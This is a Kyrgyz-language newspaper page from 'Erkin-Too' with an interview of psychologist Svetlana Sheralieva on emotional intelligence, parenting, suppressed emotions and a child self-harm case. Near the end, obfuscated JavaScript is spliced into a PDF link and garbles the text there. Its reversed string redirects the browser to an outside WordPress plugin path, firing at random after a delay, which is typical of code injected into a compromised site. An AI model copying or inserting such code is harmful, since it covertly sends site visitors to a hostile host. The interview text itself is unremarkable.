"Эркин-Тоо"

Психолог Светлана Шералиева: «Өз бактыңа чыккынчылык кылба!»

Адам бактылуу болуу үчүн көп нерсени өзгөртүүгө мүмкүнчүлүгү бар. Ал үчүн артыкчылыгыбыз менен кемчиликтерибизди баамдап, өзүбүздү тааный билүү маанилүү. Балдарыбызга өз учурунда  туура багыт берүү да өтө зарыл нерсе. Бул тууралуу психолог Светлана Шералиева менен маек курдук.

 Светлана, сиздерге кайрылгандардын саны көп болгондуктан, акыркы учурларда психологдордун жетишсиздиги пайда болду. Психология адам үчүн канчалык маанилүү?

Психология жашообуздун бардык тармактарында аралашып жүрөт эмеспи. Акыркы убакта мына ушуну түшүнүп кайрылгандардын саны көбөйүүдө. Башында аялдар гана жеке жана үй-бүлөлүк көйгөйлөрүнөн улам кайрылган учурлар көп эле. Азыр эркектер да психологдун керектигин түшүнүп башташты. Турмуштук ар кандай кырдаалга тушукканда ички жан дүйнөсүндөгү сезимдерди башкара албай, башка келген сыноодон арылууда өзүнүн алы келбей депрессияга түшкөндөр көп кайрылышат. Психология бардык тармакта зарыл нерсе. Адамдын жеке жашоосунда, дегеле коомдо өз ордун табууда, инсан катары калыптанууда жана ички дүйнөсүнүн өнүгүүсүнө түздөн-түз байланышы бар.

Адамдын психологиясы төрөлгөндөн баштап калыптанат эмеспи. Биз көп учурда жаш бала деп анын кээ бир кыймыл-аракеттерине маани бербейбиз. Натыйжада анын келечегинде көп көйгөйдүн жаралуусуна түрткү болобуз. Өзгөчө карантин учурунда дегеле акыркы убактарда балдарга болгон зордук-зомбулук көп катТалууда. Сизге бул боюнча да кайрылгандар болсо керек?

Карантин учурунда мындай көйгөй менен келген 2-3 адам болду. Бирөө 10 жаштагы кызы менен келди. Кызы өзүнүн колдорун бычак менен тилет экен. “Көрүп коркуп кеттим, эмне себептен минтип жатат? Ата-эне катары абдан жакшы мамиле кылабыз, катуу урушпайбыз”,-дейт апасы тынчсызданып. Чындыгында жакшы үй-бүлө экен. Сүйлөшүп, изилдей келсек кыздын апасынын өзүндө кандайдыр бир ачууңду ичке кат деген бекем түшүнүк бар экен. Өзү дайыма күлүп, жайдары жүрөт. Адам болгондон кийин ар бирибиздин ичибизде ар кандай сезим бар. Сүйүнүч, канааттануу эмоциялары болот. Ошону менен катар терс эмоциялар да орун алган. Адамдар мындай терс эмоциядан алыс болууга аракет кылышат. Бирок, адам болгондон кийин андай сезимден качып кутула албайбыз. Ич тардык жаман сапат дегенибиз менен андан арылуу мүмкүн эмес. Жогоруда айтып жаткан окуяда, апасы сыртынан жылмайып, терс эмоциясын ичине бекитип турат. Антип аракет кылган менен  ичинде кайнап турган терс эмоция эч жакка жок болуп кетпейт. Кызына да “эки кичине сиңдиңе катуу сүйлөбө, кол көтөрбө”,- деп тыюу салып турат экен. Удаа төрөлгөн балдардын бири-бири менен урушушу, ортолорундагы келишпестиктер кадимки эле көрүнүш. Бирок, көпчүлүк ата-энелер балдарынын мындай мамилелерине катуу кыжаалат болушат. Ооба, бири-бириңди сыйла, жакшы мамиледе бол деп айтыш керек. Ошол эле учурда терс эмоциялдарга да орун бергенге аракет кылуу зарыл.

Андай терс эмоцияны өз учурунда чыгаруу зарылбы?

Балабыздын ачуусу келип жатканын көргөндөн кийин сенин ачууң келип жатабы деп сурашыбыз керек. “Ооба, менин ачуум келип жатат!” деп сезимибизди сыртка чыгарып алгандан кийин, ал эмоциябыздын энергиясы өзүнөн өзү ылдыйлай баштайт. Ачууланба деп тыюу сала бергенден улам ал кыз ичинен чыдай берген, акыры батыра албай өзүнүн денесин кескенге өткөн.

Карантин убагында ар кандай зордук-зомбулук көп болду деп жатпайбызбы. Биздин коомдо азыркы мен токтолгон кырдаал сыяктуу социалдык эрежелер бар. Ачууң келбеш керек, дайыма жакшы маанайда жүрүү зарыл деп идеалдаштырып ийгенбиз. Бирок, адам болгонубуздан кийин ичибизде ар кандай сезимдер болот. Ошол үчүн баланын сезимдерин көрүп турган соң, аны чыгарууну ата-эне үйрөтүп жардам бериши керек. Биз тескерисинче ыйлаган балабызды жаман көрүп, үнүңдү чыгарба деп тыюу салабыз. Бул социалдык эрежелерге кирет. Негизи психологиянын өзүнүн мыйзамдары бар. Ооба, карантин учурунда өз жанына кол салган балдардын саны көп болду. Демек, ал балдардын ичинде батпай кеткен сезимдери болгон.

Азыр балага тыюу салбай эркин чоңойтуш керек деген принцип менен тарбиялаган ата-энелердин саны арбыды. Кыргызда каада-салт, үрп-адат, жүрүм-турум менен эле баланын да, кыздын да ордун көрсөтүп турушкан. Заманбап тарбия деген түшүнүккө кирип кетип, улут катары таалим-тарбия жаатындагы баалуулуктарыбызды өзгөртүп жибербейбизби?

Албетте, баланы таптакыр эркин койбош керек. Себеби, ар бир адамда жеке психологиялык чек аралар бар. Аны балага куру сөз менен эмес, жүрүм-турумуң менен көрсөтүү зарыл. Баланы кантип туура тарбиялайбыз деп көп түйшөлөбүз. Негизи ата-эне ички дүйнөсүн байытуу менен сезимдерин башкаруунун, жашоодон канагат алуунун аракетинин үстүнөн иштеши керек. Жашоодон канагат алуу — бул бактылуулук. Эмнеге биз ошол бакытты ала албайбыз. Анткени, бизди бирөө таарынтат, бирөө жаман карап коёт, бирөө биздин каалаганыбызды кылбайт. Ошол үчүн менин жашоом ушундай деген капалануу сезимдерге ээ болобуз. Негизи эле баланы тарбиялоодон мурун өзүңдү-өзүң тарбиялашың керек. Тарбиялоо деген бул тыюу салуу эмес.

Эң алгач өзүңдүн ички дүйнөңдө эмне болуп жаткандыгына көңүл бурушуң керек. Биз өзүбүздүн энергиябызды “эл эмне дейт?” же “эл эмне деп жатат?” деген кыжаалаттыкка коротуп алабыз. Ошондуктан, көңүлүңдүн чордонун өзүңө буруп, талдоо жүргүзүү керек. Ошону менен катар психологияда баланын жана чоң адамдардын позициясы деген түшүнүк бар. Бала кичине болгондуктан, эмоциясын ичине батыра албай ар кандай кыялын көрсөтөт. Ал эми жетилген жаштагы чоң адам ичиндеги эмоцияларды толук сезгенди, башынан өткөзгөндү үйрөнөт. Ошол эле учурда алдыдагы жашоосунда боло турган кырдаалдарга алдын-ала түйшөлбөй, учурдагы бакытты сезе билсе чоң кишинин позициясында турат деп айтабыз. Менин баамымда биздин коомдогу адамдардын 99 пайызы кичине баланын позициясында жашайт. Көп таарынабыз, ачуубуз келет, ичибиз күйөт . Баягы мен айтып жаткан чоң  кишинин позициясына өтүш үчүн ичиңен психологиялык эмоционалдык жактан өсүшүң керек. Физиологиялык жактан 40 жаштагы адам менен сүйлөшө келсең, ичинде 5-6 жашар бала жашайт. Демек, биз баланы тарбиялоодон мурун чоң кишинин аң-сезимине өтүүбүз зарыл.

Кантип өтөбүз?

Мурда биз академиялык билимге басым жасачубуз. Бирок, кээ бир учурда терең билимдүү деген адам жашоого адаптацияланбаган болот. Ал кыйын математик же кыйын физик болгону менен жеке жашоосунда адам менен мамиле түзүүнү билбейт. Акыркы убакта эмоционалдык интеллектке өзгөчө басым жасалып жатат. Анткени, эмоционалдык интеллектибиз жогору болсо, коомдо, жеке жашоодо, үй бүлөдө коммуникацияны туура түзгөнгө мүмкүнчүлүгүбүз болот.

Эмоционалдык интеллекти кантип жогорулатуу керек?

Биринчиден адам өзүнүн ичинде кандай сезимдер болуп жаткандыгын аныкташы керек. Себеби, кандайдыр бир күтүлбөгөн жагдай болуп кеткен учурда, дароо автоматтык түрдө реакция кылабыз. Шашылбастан адегенде өзүнүн ичиндеги сезимин аныктоо эмоционалдык интеллект болуп саналат. Экинчиден, жаныңдагы адамдын эмне сезип жаткандыгын сезе билүү. Качан биз ички сезимдерибизди жогорулатсак, сезе билүү табигый жол менен келет. Сезимиңдин түпкүрүндө өзүңө болгон баа төмөн болсо, жаныбыздагы адам да мен жөнүндө ушундай ойдо деген түшүнүктө болобуз. Балким, ал таптакыр андай эместир. Мына ошол нерсени ажырата билүүгө үйрөнүш керек. Бул эмоционалдык интеллекти жогорулатканга түрткү болот. Үчүнчүдөн, адам ар дайым өзүнүн үстүнөн иштеши керек. Азыр психологдорго барып сабак алагандар көбөйүп жатат. Бул туура. Себеби, адам өзүндөгү бакытты сезе билүү үчүн ичиндеги эмоционалдык таңкыстыктан же жарааттан арылышы керек.  Мындай кемчилик ар бир адамда бар. Адамдын психикасы ошол кыйынчылыктын арты  менен өнүгөт.

Ал адамдагы эмоционалдык таңкыстык же жараат кайдан пайда болот?

Аны бала чагыбыздан алабыз. Негизи баланын психологиясы төрөлгөндөн тартып жети жашка чейин калыптанааары айтылат. Азыркы психологдордун изилдөөлөрү боюнча эненин жана атанын ичиндеги урук клетка абалында эле атаандашуулар баштааларын, бала эненин курсагында жатканда да ар кандай эмоциялар болоору менен байланыштырышат. Бала жети жашка чейин айтылган сынды, аны талдоону билбегендиктен баарын түз кабыл алат.  Эмоционалдык таңкыстык жана жарааттар ошондон пайда болот. Ошондуктан, эмоционалдык интеллектибизди өнүктүрүш үчүн ошол жарааттарбыздын үстүндө иштөө менен психологдон кеңеш алуу зарыл. Биз ошол кемчиликтерибизден арылгандан кийин баланы тарбиялоонун деле кереги жок болуп калат. Анткени балаң өзүңдү көрүп чоңоё берет.

Ата-энелердин ортосундагы сүйүү же келишпестиктер да баланын кийинки тагдырына таасирин бербей койбойт. Мына ушул мамиленин маанилүүлүгүнө да токтоло кетсең. Анткени, акыркы убактарда үй-бүлөдөгү чыр-чатактар, ажырашуулар  көп болуп жаткандыгын айтып жатпайбызбы.

Негизи бала жарык дүйнөгө келгенден тартып, мага бул дүйнө коопсуз, менин ордум бар деген түшүнүк менен чоңоюшу керек. Өзгөчө буга энесинин эмоционалдык абалы таасир этет. Эгерде, кыйналып төрөп же атасы менен болгон мамилеси начар болсо, ошол нерсенин бардыгын бала өзүнө кабыл ала берет. Бала жети жашка чейин өзүнүн сезими менен ата-энесинин сезимин ажыратканды билбейт. Көп учурда мага кайрылган адамдар өздөрүн бардык нерсеге күнөөлүү сезишээрин айтышат. Бардыгын ачык сүйлөшө келгенде апасынын бир кездеги сезимин өзүнө топтоп алган болот. Кичине бала ата-энесин жакшы көргөн үчүн алардын кыйналып жатканын көрүп, буга мен күнөөлүмүн деген чечим чыгарып алат. Ошону менен катар эки жашка чыга элек баланы тамакты төгүп алганы же кайсыл бир нерсени сындырып алганы үчүн урушабыз. Мына ушулардын кесепетинен өзүн-өзү баалоосу төмөндөйт. Дене мүчөсүндөгү же келбетиндеги кемчиликтерин айтып шылдыңга албоо керек. Баланын психологиясынын калыптанышы үчүн алгачкы жети жыл өтө маанилүү.

Балага болгон тарбияны өзгөртүүдөн мурун өзүбүз өзгөрүшүбүз зарыл. Өзүбүз өзгөрмөйүн канчалык аракет кылбайлы эч кандай тыянак чыкпайт. Жогоруда айтып кеткенимдей эмоционалдык интеллектибиз тууралуу ойлонушубуз керек. Адам бул жашоого бактылуу болуш үчүн келет. Бактылуу болуш үчүн ички дүйнөбүз менен иштешибиз зарыл. Ансыз ашкан байлыгың болсо да бактылуу боло албайсың. Ар бир адамда чыныгы каалоо, максат бар.

Көпчүлүгүбүз “эл эмне дейт?” деген стереотиптен чыга албай келебиз. Мындай калыптанган көз караш көп нерседен чектейт. Бул туурабы?

Мына ушундай көз караштан улам биз өзүбүзгө-өзүбүз чыккынчылык кылабыз. Элдин пикирин өйдө коюп, өзүбүздүн каалообузду четке кагып коёбуз. Бирок, ички дүйнөбүздө кыйнала беребиз. Анткени, биз үчүн ал өтө маанилүү. Ошол эле учурда биз коомдо жашаганыбыздан кийин, социалдык эрежелер, каада-салттарыбыз да бар эмеспи. Аны да эске алуу менен каалооңду да ишке ашыра билишиң керек. Бул өтө кылдаттык менен карай турган маселе.

Баланын көзүн карап чоңойтуп, өзүнүн каалоолоруна чек койгон ата-энелер бар. Адамдын жашоосунда эң биринчи бала маанилүү болушу керекпи же өзүбү?

Эң биринчи өзүңө кам көрүү керек. Биз көпчүлүк учурда балабыз үчүн  ден соолугубузга карабай иштейбиз. Качан оорулуу болуп калганда сени багам деп жүрүп ден соолугумдан ажырадым деп, аны күнөөкөр кылып коёбуз. Ушундай сезимден арыла албай жүргөн аялдар мага көп кайрылышат. “Мен балама бүт өмүрүмдү арнасам, ал мени карабай кетти” дешет. Ал үчүн ким күнөөлү же аны ким суранды? Жаштыгын баласына арнап, өзү деле жыргап жашабай, жыйынтыгында бактысыз болуп калды. Бул учурда бала да бактысыз болуп калат. Анткени, апасынын тагдыры үчүн өзүн күнөөлүү сезет. Кайрадан бала карыздан кутулуш үчүн өзүнүн бактысынан баш тартып, апасы үчүн жашай баштайт. Жыйынтыгында экөө тең бактысыз болуп калышат.

Мындай болбошу үчүн эмне кылуу керек?

Самолётто авариялык жагдай жаралып калса, кислороддук масканы балаңа эмес, адегенде өзүң кийишиң керек. Жашоодо да дал ошондой болушу шарт. Эң биринчи өзүңдү ойло. Ошондо бала да эркин болот. Анча-мынча нерселерди да көңүлүңдүн сыртынан кетиресиң. Алган академиялык билимиң  эмес, жан дүйнөңдүн баасы маанилүү болушу керек. Өзүңдү баалоо менен баланын келечегине да дал ошондой жолду ачып берген болосуң. Адам жашоосунда ошондо гана ийгиликтүү жана бактылуу боло алат.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/01_02.pdf»>2022-жылдын 1-февралы

Жылдыз  ДЫЙКАНОВА

Please wait while flipbook is loading. For more related info, FAQs and issues please refer to DearFlip WordPress Flipbook Plugin Help documentation.

Пример HTML-страницы
error: Content is protected !!